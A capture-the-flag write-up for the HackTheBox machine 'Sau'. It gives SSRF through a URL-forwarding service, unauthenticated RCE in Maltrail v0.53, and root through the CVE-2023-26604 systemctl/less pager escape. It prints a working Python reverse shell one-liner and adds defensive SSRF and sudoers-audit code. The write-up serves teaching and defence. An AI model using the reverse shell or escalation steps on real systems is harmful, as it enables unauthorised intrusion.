HTB - Sau

Summary

The initial nmap scan shows that this box hosts a web service on port 55555, while port 80 is filtered. The service on 55555 works much like a URL shortener, except that it forwards API calls to a URL you supply. Because port 80 is not reachable from outside, we can use that forwarding feature to proxy our requests to localhost:80 and reach the service listening there.
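To show the defender's side of the forwarding trick above, here is an added example (my own code, not code from the box or from the forwarding service it runs) of an egress check that a request-forwarding service could apply to a user-supplied URL before fetching it. The function names (forwarding_allowed, resolve_targets) are my own, and the URLs used in the demo are constructed for the example.

```python
"""Added example: refuse to forward requests to loopback, private or
otherwise non-public addresses. Not code from the box or its services."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _is_internal(ip):
    """True for any address a forwarding service must never reach on a
    user's behalf: loopback, RFC1918/ULA, link-local, multicast, reserved."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_targets(host):
    """Every address the host name maps to; empty set means 'fail closed'."""
    try:
        # Literal IPv4/IPv6 (urlsplit strips the brackets, strip() is defensive)
        return {ipaddress.ip_address(host.strip("[]"))}
    except ValueError:
        pass
    # RFC 6761: 'localhost' and '*.localhost' always mean the loopback interface,
    # so treat them as such without consulting DNS.
    if host == "localhost" or host.endswith(".localhost"):
        return {ipaddress.ip_address("127.0.0.1")}
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return set()
    return {ipaddress.ip_address(info[4][0]) for info in infos}


def forwarding_allowed(url):
    """Return (allowed, reason). Only plain http(s) URLs whose host resolves
    exclusively to globally routable addresses are allowed."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    targets = resolve_targets(host)
    if not targets:
        return False, f"{host!r} did not resolve"
    for ip in targets:
        if _is_internal(ip):
            return False, f"{host!r} resolves to non-public address {ip}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample URLs for the demo; none are fetched.
    for sample in ("http://localhost:80/", "http://127.0.0.1/",
                   "http://[::1]/", "http://192.168.1.10/",
                   "file:///etc/passwd", "http://1.1.1.1/"):
        print(f"{sample:28} -> {forwarding_allowed(sample)}")
```

One caveat for anyone adapting this: the check is only as good as the connection that follows it. The fetch must connect to the address that was validated (or re-run the check on every redirect hop); otherwise a host whose DNS answer changes between validation and connect, or a 302 that points back at localhost, gets around it.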

Oddly enough, my browser does not render the page properly after being redirected. Still, we can learn something about the service on port 80 by inspecting the page source, which shows that it is running Maltrail v0.53. A quick search online shows that this version of Maltrail is vulnerable to unauthenticated RCE through the username parameter of the login page. So we set up a reverse shell using an exploit found online, and that gets us the user.

Getting to root was pretty easy. We run sudo -l first as usual, and find that we have sudo access to systemctl status trail.service. The relevant CVE for this vulnerability is CVE-2023-26604. Because we can run systemctl as sudo and its output is shown through the less pager, we can launch a shell from the pager by entering !/bin/sh. That gets us root. :D

Extra Info

A basic Python reverse shell looks like this (10.10.0.1:4242 is the address of our listener).

python -c 'import socket, os, pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

As for why we are able to get a root shell through systemctl:

A vulnerability was found in the systemd package. The systemd package does not adequately block local privilege escalation for some Sudo configurations, for example, plausible sudoers files, in which the systemctl status command may be executed. Specifically, systemd does not set LESSSECURE to 1, and thus other programs may be launched from the less program. This issue presents a substantial security risk when running systemctl from Sudo because less executes as root when the terminal size is too small to show the complete systemctl output.

Essentially, when the terminal is too small to show the full output, systemctl pipes it through less, which lets us use the technique listed on GTFOBins for less. Since we have sudo access to systemctl, the escape from less gives us a root shell.
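To turn the CVE explanation above into something you can check on a host, here is an added audit helper (my own code, not part of the writeup, the box, sudo or systemd) that flags sudoers rules granting systemctl or journalctl as root without --no-pager, plus a check of whether the environment a command will run with neutralises the pager. The sudoers content and user names are constructed for the example; parse_rule, pager_risk, risky_rules and pager_env_hardened are hypothetical names.

```python
"""Added example: find sudoers rules that can spawn a root pager, the
precondition for the CVE-2023-26604 less escape. Not code from the page."""
import re
import shlex

# Tools that page long output through $SYSTEMD_PAGER / $PAGER (less by default).
PAGING_TOOLS = {"systemctl", "journalctl"}

# Constructed sample sudoers content; the user names are placeholders.
SAMPLE_SUDOERS = """\
# sample sudoers, constructed for this example
Defaults env_reset
lowpriv ALL=(ALL) NOPASSWD: /usr/bin/systemctl status trail.service
ops     ALL=(ALL) NOPASSWD: /usr/bin/systemctl status --no-pager trail.service
admin   ALL=(ALL) ALL
"""


def parse_rule(line):
    """Split a user-spec line into (user, command list string).
    Returns None for blanks, comments and Defaults lines."""
    line = line.strip()
    if not line or line.startswith("#") or line.startswith("Defaults"):
        return None
    # user specs look like: who hosts = (runas) [TAG:] command[, command ...]
    m = re.match(r"^(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(.*)$", line)
    if not m:
        return None
    user, cmds = m.group(1), m.group(2)
    # drop tag prefixes such as NOPASSWD: or SETENV:
    cmds = re.sub(r"^(?:[A-Z]+:\s*)+", "", cmds)
    return user, cmds


def pager_risk(cmds):
    """Reason string if one of the commands runs a paging tool as root with
    the pager still enabled; None otherwise. A bare ALL is a broader problem
    than this check covers, so it is deliberately not reported here."""
    for cmd in cmds.split(","):
        cmd = cmd.strip()
        if not cmd or cmd == "ALL":
            continue
        argv = shlex.split(cmd)
        tool = argv[0].rsplit("/", 1)[-1]
        if tool in PAGING_TOOLS and "--no-pager" not in argv[1:]:
            return f"{tool} runs as root with the pager enabled"
    return None


def risky_rules(sudoers_text):
    """List of (user, reason) for every rule that pager_risk flags."""
    findings = []
    for line in sudoers_text.splitlines():
        parsed = parse_rule(line)
        if parsed is None:
            continue
        user, cmds = parsed
        reason = pager_risk(cmds)
        if reason:
            findings.append((user, reason))
    return findings


def pager_env_hardened(env):
    """True when the environment the tool will actually run with either
    disables the pager (SYSTEMD_PAGER/PAGER empty or 'cat') or puts less in
    secure mode (LESSSECURE=1), which is what a fixed systemd sets itself."""
    pager = env.get("SYSTEMD_PAGER", env.get("PAGER"))
    if pager is not None and pager.strip() in ("", "cat"):
        return True
    return env.get("LESSSECURE") == "1"


if __name__ == "__main__":
    for user, reason in risky_rules(SAMPLE_SUDOERS):
        print(f"{user}: {reason}")
    print("pager hardened with SYSTEMD_PAGER=cat:",
          pager_env_hardened({"SYSTEMD_PAGER": "cat"}))
```

On a real host, feed it the output of visudo -c -f or the files under /etc/sudoers.d and review each finding. The durable fix is a systemd release that contains the patch for CVE-2023-26604 (the NVD entry places the fix in systemd 247); until then, add --no-pager to the granted command in the rule itself, since the caller's SYSTEMD_PAGER or LESSSECURE values are discarded by sudo's env_reset.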

References